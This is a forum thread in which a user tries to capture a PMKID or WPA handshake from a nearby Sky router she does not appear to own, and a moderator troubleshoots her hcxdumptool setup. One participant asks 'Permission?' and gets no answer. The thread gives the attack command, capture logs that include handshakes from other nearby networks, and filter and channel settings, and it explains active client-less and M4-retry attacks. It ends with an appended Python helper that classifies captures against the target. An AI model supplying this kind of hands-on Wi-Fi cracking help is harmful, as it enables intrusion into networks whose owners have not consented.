
Wireless Cracking: SKY router, tried PMKID, EAPOL - nothing :(


Monica
Status: n/a | Joined: Fri, 21 Sep 2018 | Posts: 35 | Reputation: 0
Mon, 24 Sep 2018 @ 14:37:52

Hey,
I have this strong-signal Sky router nearby, but there are no clients, and I have tried for a few days but I cannot catch a PMKID.

I'm using the same methods that work elsewhere, but I must admit I have never captured any Sky before.

Is there something that I'm missing?

For hcxdumptool my filter contains only one entry (the Sky target), but I pick up PMKIDs from other stations; I don't understand why...

Is there any point in listening longer than a day with it? Seems hopeless.


meso
Status: Banned | Joined: Wed, 19 Sep 2018 | Posts: 25 | Reputation: 0
Mon, 24 Sep 2018 @ 14:43:47

WARNING! User is BANNED and maybe a SCAMMER.

Monica said:


Is there something that I'm missing?

Permission?


freeroute (Moderator)
Status: Trusted | Joined: Sat, 16 Jul 2016 | Posts: 3618 | Reputation: 10343
Mon, 24 Sep 2018 @ 15:05:59

Monica said:

Hey,
I have this strong-signal Sky router nearby, but there are no clients, and I have tried for a few days but I cannot catch a PMKID.

I'm using the same methods that work elsewhere, but I must admit I have never captured any Sky before.

Is there something that I'm missing?

For hcxdumptool my filter contains only one entry (the Sky target), but I pick up PMKIDs from other stations; I don't understand why...

Is there any point in listening longer than a day with it? Seems hopeless.


Is the target access point in transmit range?

Command: "hcxdumptool -i physical_interface --do_rcascan -t 5"
[21:18:00] xxxxxxxxxxxx networkname [CHANNEL 1, AP IN RANGE]


XMPP: freeroute@xmpp.jp
General rules | Paid section rules

Monica
Status: n/a | Joined: Fri, 21 Sep 2018 | Posts: 35 | Reputation: 0
Mon, 24 Sep 2018 @ 20:43:28

It says AP IN RANGE for the needed BSSID.


freeroute (Moderator)
Status: Trusted | Joined: Sat, 16 Jul 2016 | Posts: 3618 | Reputation: 10343
Mon, 24 Sep 2018 @ 21:54:10


Correct filterlist entry (112233445566)?
--filterlist=file : mac filter list
format: 112233445566 + comment
maximum line length 255, maximum entries 64

Correct filtermode (--filtermode=2)?
--filtermode=digit : mode for filter list
1: use filter list as protection list (default)
2: use filter list as target list

Channel set to ap channel (-c 1)?
-c digit : set scanlist (1,2,3,...)
default scanlist: 1, 3, 5, 7, 9, 11, 13, 2, 4, 6, 8, 10, 12
maximum entries: 127
allowed channels:
1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14
34, 36, 38, 40, 42, 44, 46, 48, 52, 56, 58, 60, 62, 64
100, 104, 108, 112, 116, 120, 124, 128, 132,
136, 140, 144, 147, 149, 151, 153, 155, 157
161, 165, 167, 169, 184, 188, 192, 196, 200, 204, 208, 212, 216

Maybe the AP isn't vulnerable to the PMKID attack?

Are the other received PMKIDs from the client-less attack? That should not(!) happen if the filterlist and filtermode are ok!

Monica
Status: n/a | Joined: Fri, 21 Sep 2018 | Posts: 35 | Reputation: 0
Mon, 24 Sep 2018 @ 22:48:41

root@kali:~# hcxdumptool -o lolsky4 -i wlan0mon --filterlist=lolsky.txt --filtermode=2 --enable_status=1

start capturing (stop with ctrl+c)
INTERFACE:...............: wlan0mon
FILTERLIST...............: 1 entries
MAC CLIENT...............: fcc233c94ffc
MAC ACCESS POINT.........: 10b7133ab040 (incremented on every new client)
EAPOL TIMEOUT............: 150000
REPLAYCOUNT..............: 64482
ANONCE...................: cf269386c67e6b63425bf1135f5cd405869df241a0ad1160ae7a6f121f397f6e

[16:13:58 - 011] 88a6c6082cf4 -> a46cf1322a78 [FOUND PMKID]
[16:14:00 - 013] f46bef397a70 -> f02765758e90 [FOUND PMKID]
[16:19:10 - 007] 54bd7917d708 -> 18a6f75f8606 [EAPOL 4/4 - M4 RETRY ATTACK]
[16:41:02 - 011] 88a6c6082cf4 -> a46cf1322a78 [FOUND AUTHORIZED HANDSHAKE, EAPOL TIMEOUT 5084]
[16:50:48 - 011] 88a6c6082cf4 -> 98ca33c360ae [FOUND PMKID]
[16:50:48 - 011] 88a6c6082cf4 -> 98ca33c360ae [FOUND AUTHORIZED HANDSHAKE, EAPOL TIMEOUT 3909]
[17:04:12 - 008] 54bd7917d708 -> 18a6f75f8606 [EAPOL 4/4 - M4 RETRY ATTACK]
[17:11:44 - 006] 18a6f75f8606 -> 54bd7917d708 [FOUND AUTHORIZED HANDSHAKE, EAPOL TIMEOUT 6258]
[17:11:44 - 006] 28f366122f3d -> 18a6f75f8606 [EAPOL 4/4 - M4 RETRY ATTACK]
[17:13:31 - 011] 88a6c6082cf4 -> dc56e76f9ed4 [FOUND AUTHORIZED HANDSHAKE, EAPOL TIMEOUT 4615]
INFO: cha=9, rx=482935, rx(dropped)=24079, tx=3381, powned=7, err=0


That's how it looks right now. It does recognize my filter list as valid (with one entry).
The filter list was created with:
echo "123456789012">lolsky.txt

I was wondering about setting a fixed channel, but none of the tutorials suggested it; I don't think that'll help though.

I have had success obtaining PMKIDs from other stations this way; there were always "other" found PMKIDs in there though, which I do find strange.

I can't tell if these are clientless...


freeroute (Moderator)
Status: Trusted | Joined: Sat, 16 Jul 2016 | Posts: 3618 | Reputation: 10343
Mon, 24 Sep 2018 @ 23:06:43

Thanks for the data.
I have to think, take some time.

By the way.
Note: INTERFACE:...............: wlan0mon
Is it a virtual interface? (You should use physical interface in monitor mode.)

Have you tried to capture it without filterlist, filtermode?

Edited: Maybe the AP isn't vulnerable to the PMKID attack.

Monica
Status: n/a | Joined: Fri, 21 Sep 2018 | Posts: 35 | Reputation: 0
Tue, 25 Sep 2018 @ 01:14:33

I have Kali Linux inside a VMware virtual machine, with a USB wifi adapter connected to it. I don't think it would work on wlan0 directly; it must be in monitor mode...

I have not tried without filters/filterlist; I barely know what I'm doing here, just following the step-by-step guides.

Would that be how it looks when the AP is not vulnerable? Why do I catch all these other PMKIDs?

Thanks for your help.


freeroute (Moderator)
Status: Trusted | Joined: Sat, 16 Jul 2016 | Posts: 3618 | Reputation: 10343
Tue, 25 Sep 2018 @ 08:39:52

We got support from the developer of hcxtools/hcxdumptool. I'll share it with you.

The filter list works like expected:

[16:13:58 - 011] 88a6c6082cf4 -> a46cf1322a78 [FOUND PMKID]
[16:14:00 - 013] f46bef397a70 -> f02765758e90 [FOUND PMKID]
[16:19:10 - 007] 54bd7917d708 -> 18a6f75f8606 [EAPOL 4/4 - M4 RETRY ATTACK]
[16:41:02 - 011] 88a6c6082cf4 -> a46cf1322a78 [FOUND AUTHORIZED HANDSHAKE, EAPOL TIMEOUT 5084]
[16:50:48 - 011] 88a6c6082cf4 -> 98ca33c360ae [FOUND PMKID]
[16:50:48 - 011] 88a6c6082cf4 -> 98ca33c360ae [FOUND AUTHORIZED HANDSHAKE, EAPOL TIMEOUT 3909]
[17:04:12 - 008] 54bd7917d708 -> 18a6f75f8606 [EAPOL 4/4 - M4 RETRY ATTACK]
[17:11:44 - 006] 18a6f75f8606 -> 54bd7917d708 [FOUND AUTHORIZED HANDSHAKE, EAPOL TIMEOUT 6258]
[17:11:44 - 006] 28f366122f3d -> 18a6f75f8606 [EAPOL 4/4 - M4 RETRY ATTACK]
[17:13:31 - 011] 88a6c6082cf4 -> dc56e76f9ed4 [FOUND AUTHORIZED HANDSHAKE, EAPOL TIMEOUT 4615]

The PMKIDs/handshakes are received only and not retrieved by an active attack.

These are all received (passive). None of them came from an active attack. hcxdumptool will show you the result of an active attack in this way:


passive attack:
[16:13:58 - 011] 88a6c6082cf4 -> a46cf1322a78 [FOUND PMKID]

active attack:
[16:13:58 - 011] 88a6c6082cf4 -> fcc233faa144 [FOUND PMKID CLIENT-LESS]

This one (18a6f75f8606) must be the target ap in the filter list, because hcxdumptool is attacking it:
[17:04:12 - 008] 54bd7917d708 -> 18a6f75f8606 [EAPOL 4/4 - M4 RETRY ATTACK]
[17:11:44 - 006] 18a6f75f8606 -> 54bd7917d708 [FOUND AUTHORIZED HANDSHAKE, EAPOL TIMEOUT 6258]

and hcxdumptool received a handshake from the AP.
The AP must be close to hcxdumptool, because the attack runs over overlapped channels. It would be nice to get a cap file to see if the AP supports PMKID caching.

You should try to run hcxdumptool without using a filter list to see if you will get a client-less PMKID or an AP-less handshake. If that works, we can say that the target AP isn't vulnerable.

Note: wlan0mon isn't a good idea because it will lead to some unexpected results, because you share(!) the physical interface.
If you create a logical interface, you will have 2 (or more) interfaces working on the same hardware. This can lead to performance drops and unwanted results/crashes.
A logical interface is just a normal interface, unless you use it in combination, in which case having to shift between different channels, or having to share a single channel, cuts the throughput by (roughly) a factor of 1/N, where N is the number of interfaces on the same physical device.

You can do a nice test to see how hcxdumptool gets access to the interface:
Stop NetworkManager and wpa_supplicant.
Use ip and iw to set the interface to monitor mode.
Run wireshark on that interface and start capturing packets.
Now run hcxdumptool and you can see that hcxdumptool disconnects wireshark from the physical interface.
That will not work if wireshark is on the physical interface and hcxdumptool on a virtual interface.

About the filterlist: the filter list is only used for the transmit branch. That means we do not send packets to the entries.
The receive branch remains unfiltered. That means we receive everything which is transmitted by other access points and clients.


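The two points freeroute's reply makes (plain FOUND lines are passive receives, while CLIENT-LESS and RETRY ATTACK lines come from hcxdumptool's own transmissions, and the filter list only restricts the transmit side) together with the filter list format quoted earlier in the thread, as a small added Python checker for reading such output. This is not code from the thread or from hcxtools: the status-line layout is assumed from the quoted output, the AP-LESS marker wording is assumed from the prose, and the sample lines are constructed from the ones posted above.

```python
import re

# Assumed layout of a result line: "[HH:MM:SS - channel] mac -> mac [MESSAGE]".
STATUS_RE = re.compile(
    r"^\[(\d\d:\d\d:\d\d) - (\d{3})\] ([0-9a-f]{12}) -> ([0-9a-f]{12}) \[([^\]]+)\]$")
# Markers that indicate a result produced by the tool's own transmissions.
ACTIVE_MARKERS = ("CLIENT-LESS", "AP-LESS", "RETRY ATTACK")

# Constructed sample, taken from the lines quoted in the thread.
SAMPLE_LOG = """\
[16:13:58 - 011] 88a6c6082cf4 -> a46cf1322a78 [FOUND PMKID]
[16:19:10 - 007] 54bd7917d708 -> 18a6f75f8606 [EAPOL 4/4 - M4 RETRY ATTACK]
[17:11:44 - 006] 18a6f75f8606 -> 54bd7917d708 [FOUND AUTHORIZED HANDSHAKE, EAPOL TIMEOUT 6258]
[17:13:31 - 011] 88a6c6082cf4 -> dc56e76f9ed4 [FOUND AUTHORIZED HANDSHAKE, EAPOL TIMEOUT 4615]
INFO: cha=9, rx=482935, rx(dropped)=24079, tx=3381, powned=7, err=0
"""
SAMPLE_FILTERLIST = "18a6f75f8606 suspected target, MAC taken from the thread\n"

def parse_filterlist(text, max_entries=64, max_line=255):
    """Validate a --filterlist file: 12 hex digits plus optional comment, limits as quoted."""
    macs = []
    for line in text.splitlines():
        if not line.strip():
            continue
        if len(line) > max_line:
            raise ValueError("filter list line exceeds %d characters" % max_line)
        mac = line.split()[0].lower()
        if not re.fullmatch(r"[0-9a-f]{12}", mac):
            raise ValueError("bad filter list entry: %r" % line)
        macs.append(mac)
    if len(macs) > max_entries:
        raise ValueError("more than %d filter list entries" % max_entries)
    return macs

def parse_status_line(line):
    """Return a dict for a result line, or None for anything else (e.g. the INFO line)."""
    m = STATUS_RE.match(line.strip())
    if not m:
        return None
    t, chan, src, dst, msg = m.groups()
    return {"time": t, "channel": int(chan), "src": src, "dst": dst,
            "msg": msg, "active": any(k in msg for k in ACTIVE_MARKERS)}

def summarize(log_text, filterlist_text):
    """Count passive vs active results and how many involve a filter-list MAC.
    Passive results from other networks are expected: the receive side is unfiltered."""
    targets = set(parse_filterlist(filterlist_text))
    counts = {"passive": 0, "active": 0, "target": 0, "unparsed": 0}
    for line in filter(str.strip, log_text.splitlines()):
        r = parse_status_line(line)
        if r is None:
            counts["unparsed"] += 1
            continue
        counts["active" if r["active"] else "passive"] += 1
        if r["src"] in targets or r["dst"] in targets:
            counts["target"] += 1
    return counts
```

Run `summarize(SAMPLE_LOG, SAMPLE_FILTERLIST)` to see that only the RETRY ATTACK line counts as active, while the PMKIDs from unrelated networks are passive receives, as the reply explains.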